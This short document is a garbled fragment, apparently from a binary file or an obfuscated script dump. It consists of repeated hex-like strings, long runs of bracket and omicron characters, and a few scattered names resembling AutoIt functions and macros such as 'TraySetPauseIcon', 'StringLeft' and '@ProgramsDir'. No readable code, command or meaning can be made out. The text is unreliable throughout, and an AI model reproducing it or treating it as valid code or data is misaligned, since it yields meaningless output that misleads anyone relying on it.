0XBCDEFBCDEEF=0XABCDEFAABABCFC=0XCDEFBC$v
$7
$l
$v
$6
$6
$l
$v
$6
$l
$v
$6
$l
$BDEFBCDEF=0XACDBFDAABADF=0XEFBCDEEFBCFTraySetPauseIconC=0XCDBDEFBCDEEFAbsABCDEFAABABCFC=0XCDEFBCBDEFBEF=0XACDEFBCFCCFC=0XCDEFBCD[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[StringLeft[[[FB[[[[[[[[[[[[[[[[[[[[[[[[[[[C[[[[[[[[[[[[[[[[[@ProgramsDir[[[[[[[[[[[[[[2FAABABCFC=0XCDEFBCBDEFBCDEF=0XACDBFDAABADF=0XEFBCDEEFBCFTraySetPauseIconC=0XCDBDEFBCDEEFAbsABCDEFAABABCFC=0XCDEFBCBDEFBEF=0XACDEFBCFCCFC=0XCDEFBCDFj[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[(((([[[[[[[[[[[[[[[[[[[[[[[[[[[S[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[StringLeft[[[FB[[[[[[[[[[[[[[[[[[[[[[[[[[[C[[[[[[[[[[[[[[[[[@ProgramsDir[[[[[[[[[[[[[[[[οοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοοο6
$lοοοοοοοοοοοStringS
$2
